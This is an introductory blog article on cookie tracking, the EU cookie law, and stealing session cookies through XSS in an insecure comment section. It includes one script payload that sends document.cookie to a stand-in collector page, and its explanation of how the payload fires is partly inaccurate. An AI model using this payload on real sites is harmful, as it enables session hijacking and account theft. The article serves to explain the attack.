
Cookie Tracking and Stealing using Cross-Site Scripting


This article discusses how cookies move around the web and how they can be stolen.

A cookie is a small piece of data, often a randomly generated alphanumeric string, that a website sends to your browser when you visit it. The browser keeps it as a record of your presence on that website and sends it back on later visits, so the site can recognize you and link the visit to your previous session. A cookie used this way is known as a session ID.

But that is not the only purpose of cookies. They are also used extensively to keep track of your preferences online, they travel from one server to another, and they can be intercepted and stolen quite easily.

The Cookie Trail

As stated earlier, when we request a webpage from a server, the server responds and the browser renders the page on our local machine. Along with the page, which is mostly HTML, CSS and some JavaScript, the server also sends a cookie (a first-party cookie) that identifies the session. Besides the website's own content, when we visit a webpage we often see a lot of adverts.

These ads are not part of that website but are supplied to it from different servers around the world in exchange for money. Whenever we click one of these ads, the browser sends a cookie back to the ad's server, and that server stores it to keep track of our preferences.

These servers also communicate with each other and form an advertising network, sharing your preferences and showing you ads according to those preferences in the future. So you are being tracked and watched by multiple entities online all the time, usually without knowing it.

Keeping this in mind, the EU passed a directive known as “The Cookie Law”, according to which a site has to ask for your permission to use cookies. This is why you see a message on certain sites like “This site uses cookies to enhance user experience…” asking for your permission.

The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone, or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and giving them a choice to allow it or not.

Cookie Theft

Shopping preferences might not count as sensitive information about an individual, but online shopping carts and banking details are really sensitive data, and all of this is also remembered by a site with the help of session cookies.

If an attacker manages to get hold of your session cookies, then that person will be able to pose as you on that site and will have access to your banking details and your Amazon shopping cart, and might order items from your Amazon account to his/her address, spending all your money.

This generally happens when the site has a vulnerability and the attacker uses something known as cross-site scripting (XSS) to exploit that vulnerability.

This is found mostly in badly coded websites where the developer forgets to include certain security measures to prevent an attacker from running a cross-site script.

How do attackers use XSS to steal cookies?

I’m going to explain this with a hypothetical scenario. So let’s say we visit one such vulnerable site which has a comments section on it.

Now, on an ideal, secure website, a comment section should display only plain text. But on an insecure site, if we post code in the comment section, the site inserts it into the page unchanged, and the browser treats it as code that came from the server and runs it.

<script>document.write('<img src="http://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '" />');</script>

  • This code, when posted in the comments section, will trick the browser into thinking that it is JavaScript code (due to the script tags) sent by the server, and the browser will run it.
  • When some user visiting the site looks at the comment section, he/she will see a link to an image in the comments section, which is the result of the script running.
  • When a user clicks on this link thinking that it is an image (whereas it is a PHP file), they get an image rendered in the comment section. What they don't know is that this link silently executed a PHP file that grabs their cookie.
  • Now the cookie, which holds that user's session ID, is saved in the attacker's database, and the attacker can pose as that user on that site.

Thank you for reading my article

And if you like it give me a follow.

Arth Kumar